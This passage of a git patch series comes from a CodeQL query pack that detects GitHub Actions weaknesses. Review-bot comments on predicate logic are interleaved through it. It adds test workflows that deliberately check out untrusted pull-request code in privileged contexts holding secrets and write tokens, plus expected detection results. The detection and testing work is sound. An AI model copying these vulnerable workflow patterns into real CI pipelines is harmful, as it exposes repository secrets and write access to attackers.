+ (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger))
+ or
+ this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable())
 }
 
 /** Holds if the job is privileged. */
@@ -775,7 +781,9 @@ class JobImpl extends AstNodeImpl, TJobNode {
 private predicate hasExplicitSecretAccess() {
 // the job accesses a secret other than GITHUB_TOKEN
 exists(SecretsExpressionImpl expr |
- expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN"
+ (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and
+ expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and
+ not expr.getFieldName() = "GITHUB_TOKEN"
 )
 }
 
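Review bot: In the new `exists` disjunct the pattern `"%github.event" + external_trigger + "%"` has no `.` between `github.event` and the event name, so with `external_trigger` bound to a bare event name — which is what `externallyTriggerableEventsDataModel` receives in the first disjunct via `getName()` — the pattern reads `%github.eventpull_request%` and cannot match an expression such as `github.event.pull_request.title`, leaving this disjunct dead. The fix is `e.getExpression().matches("%github.event." + external_trigger + "%")`. The reusable-workflow results added to the `.expected` files in this commit presumably come from the `getACaller().isExternallyTriggerable()` disjunct instead; a test where the reusable workflow has no caller in the database would expose the difference.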
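Review bot: The comment `// the job accesses a secret other than GITHUB_TOKEN` is now inaccurate: with `not exists(expr.getEnclosingJob())` the predicate also holds for a `secrets.*` expression that lies outside every job of the same workflow, so each job of that workflow is treated as having secret access. Reword it to `// the job, or its enclosing workflow outside any job (e.g. workflow-level env), accesses a secret other than GITHUB_TOKEN` so the over-approximation is visible to the next reader. The predicate is complete within the hunk.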
@@ -803,16 +811,21 @@ class JobImpl extends AstNodeImpl, TJobNode {
 private predicate hasPrivilegedTrigger() {
- // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork.
- // The Job is triggered by an event other than `pull_request`
+ // the Job is triggered by an event other than `pull_request`
 count(this.getATriggerEvent()) = 1 and
- not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"]
+ not this.getATriggerEvent().getName() = "pull_request" and
+ not this.getATriggerEvent().getName() = "workflow_call"
 or
- // The Workflow is a Reusable Workflow only and there is
- // a privileged caller workflow
- this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged()
+ // the Workflow is a Reusable Workflow only and there is
+ // a privileged caller workflow or we cant find a caller
+ count(this.getATriggerEvent()) = 1 and
+ this.getATriggerEvent().getName() = "workflow_call" and
+ (
+ this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or
+ not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller())
+ )
 or
- // The Workflow has multiple triggers so at least one is not "pull_request"
+ // the Workflow has multiple triggers so at least one is not "pull_request"
 count(this.getATriggerEvent()) > 1
 }
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index 3bc1f3649a3b..6c3b042d1e7d 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
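Review bot: The new middle branch treats a `workflow_call`-only job as privileged whenever `getACaller()` has no result, which is the conservative choice but is only explained by `or we cant find a caller`; state the reasoning and fix the typo, e.g. `// a privileged caller workflow, or no caller in the database (callers may live elsewhere; assumed privileged to avoid false negatives)`. The removed comment about `pull_request_target` granting a read/write `GITHUB_TOKEN` and secret access was the only justification for counting any non-`pull_request` trigger as privileged in the first branch, and nothing replaces it; keep a version of it above `count(this.getATriggerEvent()) = 1 and`. The predicate is complete within the hunk.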
@@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt
 exists(StepsExpression e |
 this.getArgumentExpr("ref") = e and
 (
- e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or
- e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"])
+ e.getStepId().matches("%" + ["head", "branch", "ref"] + "%") or
+ e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%")
 )
 )
 )
@@ -138,8 +138,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
 exists(StepsExpression e |
 this.getArgumentExpr("ref") = e and
 (
- e.getStepId().matches(["%sha%", "%commit%"]) or
- e.getFieldName().matches(["%sha%", "%commit%"])
+ e.getStepId().matches("%" + ["head", "sha", "commit"] + "%") or
+ e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%")
 )
 )
 )
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 649064e1ddd5..30aa95964e10 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.28
+version: 0.0.29
 dependencies:
 codeql/util: ^0.2.0
 codeql/yaml: ^0.1.2
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index d0d7e48a1b2e..4c89d7804a90 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.28
+version: 0.0.29
 groups:
 - actions
 - queries
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 67c8bbc2b654..ac4761deda1f 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
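Review bot: Adding `head` to the `ActionsSHACheckout` patterns in the second hunk (`@@ -138`) makes a `ref` built from a field or step id such as `head_ref` count as an immutable SHA checkout, while the first hunk classifies the same expression as a mutable-ref checkout; the two classes now overlap, and a mutable `head_ref` treated as SHA-pinned may suppress an untrusted-checkout alert depending on how the queries consume `SHACheckoutStep`. Keep the SHA class to names that say so, `e.getFieldName().matches("%" + ["sha", "commit"] + "%")`, and if `head` is wanted there, pair it with an exclusion such as `not e.getFieldName().matches("%" + ["ref", "branch"] + "%")` (same for `getStepId()`). Both class bodies extend beyond their hunks.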
@@ -315,6 +315,8 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4fb130aa07a8..c69af0316bf5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -283,7 +283,5 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6bef24d86d79..d434bd63c518 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -9,3 +9,4 @@ | .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml new file mode 100644 index 000000000000..b539c562084e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -0,0 +1,33 @@ +name: Test + +on: + workflow_call: + +env: + API_KEY: ${{ secrets.API_KEY != '' && secrets.API_KEY }} + +jobs: + mend: + runs-on: "ubuntu-latest" + steps: + - name: "Set the checkout ref" + id: set_ref + run: | + if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then + echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT + else + echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT + fi + + - name: "checkout" + if: success() + uses: "actions/checkout@v4" + with: + fetch-depth: 1 + ref: ${{ steps.set_ref.outputs.ref }} + + - name: "setup ruby" + if: success() + uses: "ruby/setup-ruby@v1" + with: + ruby-version: 2.7 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml new file mode 100644 index 000000000000..d8381176fd23 
--- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -0,0 +1,23 @@ +name: Test + +on: + pull_request: + +permissions: + contents: write + pull-requests: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Check out repo on head ref + uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8 + with: + ref: ${{ github.head_ref }} + token: ${{ secrets.DOCUBOT_REPO_PAT }} + + - run: | + ./cmd + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index dbbfba0a5574..b048fb398a4b 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -14,4 +14,5 @@
 | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step |
 | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step |
 | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step |
+| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step |
 | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index ca86bac14f0e..1f90c56607df 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -3,5 +3,7 @@ | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1fc45eb2969202fda4690a095dd9889746e16e88 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:33:35 +0200 Subject: [PATCH 308/707] Improve ControlCheck for untrusted checkouts --- .../security/UntrustedCheckoutQuery.qll | 28 ++++++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 7 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 13 ++-- .../CWE-829/UntrustedCheckoutMedium.ql | 6 +- .../CWE-829/.github/workflows/dependabot1.yml | 45 ++++++++++++ .../CWE-829/.github/workflows/dependabot2.yml | 68 +++++++++++++++++++ .../CWE-829/.github/workflows/test2.yml | 20 ++++++ .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 10 files changed, 177 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 6c3b042d1e7d..ba31b0de500a 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -227,7 +227,14 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { } +abstract class ControlCheck extends If { + predicate dominates(Step step) { + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + } +} class LabelControlCheck extends ControlCheck { LabelControlCheck() { 
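Review bot: `dominates` counts an `if` on any step of a needed job (`getANeededJob().(LocalJob).getAStep().getIf() = this`) as controlling the checkout, but a skipped step does not make the needed job fail or stop the dependent job from running, so a step-level actor or label check in a prerequisite job does not actually gate this step; only the needed job's own `if` (or a step whose failure fails that job) does. Because the same predicate is used by the `not exists(ControlCheck check | check.dominates(checkout))` conditions in the later hunks of UntrustedCheckoutCritical.ql, UntrustedCheckoutHigh.ql and UntrustedCheckoutMedium.ql, this looks like it will suppress real findings. If the step-level case is an intentional precision trade-off, the predicate should say so; at minimum it needs QLDoc such as `/** Holds if this check guards step: it is the step's own if, its enclosing job's if, or the if of a job that job needs. */`. Whether `getANeededJob()` is transitive is not visible here; if it is not, a check on a job further up the `needs` chain is missed.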
@@ -244,15 +251,28 @@ class LabelControlCheck extends ControlCheck { class ActorControlCheck extends ControlCheck { ActorControlCheck() { - // eg: contains(github.actor, 'dependabot') - // eg: github.triggering_actor != 'CI Agent' + // eg: github.actor == 'dependabot[bot]' + // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class RepositoryControlCheck extends ControlCheck { + RepositoryControlCheck() { + // eg: github.repository == 'test/foo' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.repository\\b", + "\\bgithub\\.repository_owner\\b", ], _, _) ) } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index c1118bc00cab..ca1b855c6ece 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -2,9 +2,9 @@ * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout-toctou/high * @tags actions * security diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 0a597ee3fa48..eae580ebd528 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
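Review bot: `RepositoryControlCheck` treats a `github.repository` or `github.repository_owner` comparison as a control check, but in a `pull_request_target` or `issue_comment` run of the upstream repository those values name the base repository regardless of who opened the pull request, so the condition holds for a fork PR and says nothing about the trustworthiness of the checked-out head. Such a check usually exists to stop the workflow running in forks of the project, not to gate untrusted input, yet counting it as a ControlCheck suppresses the untrusted-checkout queries for every workflow that has one. A genuine fork check compares the head repository, e.g. `github.event.pull_request.head.repo.full_name == github.repository`; consider matching that expression instead, or document in the class comment why a base-repository check is accepted. The `ActorControlCheck` comment now only shows equality examples, while the regex still matches any use of the actor value (including `contains(github.actor, ...)`), which is worth saying explicitly.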
@@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is followed by a known poisonable step checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 29a15accdf27..9faab24dbcbe 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -4,9 +4,9 @@ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout/high * @tags actions * security @@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index aa62a88935b2..574c2d7bffe9 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -21,9 +21,9 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a non-privileged context ( inNonPrivilegedCompositeAction(checkout) or inNonPrivilegedJob(checkout) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml new file mode 100644 index 000000000000..afe1dfab038b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml 
@@ -0,0 +1,45 @@ +name: Check dist + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: # make sure the checked in dist/ folder matches the output of a rebuild + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Compare the expected and actual dist/ directories + run: script/check-diff + verify-index-js: # make sure the entrypoint js files run on a clean machine without compiling first + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: ./ + with: + milliseconds: 1000 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml new file mode 100644 index 000000000000..072eae4b1d2a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml 
@@ -0,0 +1,68 @@ +name: Compile dependabot updates + +on: + pull_request: + +permissions: + pull-requests: write + contents: write +jobs: + fetch-dependabot-metadata: + runs-on: ubuntu-latest + # We only want to check the metadata on pull_request events from Dependabot itself, + # any subsequent pushes to the PR should just skip this step so we don't go into + # a loop on commits created by the `build-dependabot-changes` job + if: ${{ github.actor == 'dependabot[bot]' }} + # Map the step output to a job output for subsequent jobs + outputs: + dependency-type: ${{ steps.dependabot-metadata.outputs.dependency-type }} + package-ecosystem: ${{ steps.dependabot-metadata.outputs.package-ecosystem }} + steps: + - name: Fetch dependabot metadata + id: dependabot-metadata + uses: dependabot/fetch-metadata@c9c4182bf1b97f5224aee3906fd373f6b61b4526 # v1.6.0 + with: + github-token: "${{ secrets.GITHUB_TOKEN }}" + build-dependabot-changes: + runs-on: ubuntu-latest + needs: [fetch-dependabot-metadata] + # We only need to build the dist/ folder if the PR relates to Docker or an npm dependency + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' || needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'npm_and_yarn' + steps: + # Check out using a PAT so any pushed changes will trigger checkruns + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + token: ${{ secrets.DEPENDABOT_AUTOBUILD }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + # If we're reacting to a Docker PR, we have on extra step to refresh and check in the container manifest, + # this **must** happen before rebuilding dist/ so it uses the new version of the manifest + - name: Rebuild docker/containers.json + if: 
needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' + run: | + npm run update-container-manifest + git add docker/containers.json + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Check in any change to dist/ + run: | + git add dist/ + # Specifying the full email allows the avatar to show up: https://github.com/orgs/community/discussions/26560 + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git commit -m "[dependabot skip] Update dist/ with build changes" || exit 0 + git push diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml new file mode 100644 index 000000000000..64e4992b5caf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: "Frogbot Scan Pull Request" +on: + pull_request_target: + types: [ opened, synchronize ] +permissions: + pull-requests: write + contents: read +jobs: + scan-pull-request: + runs-on: ubuntu-latest + environment: frogbot + steps: + - uses: actions/checkout@v2 + with: + 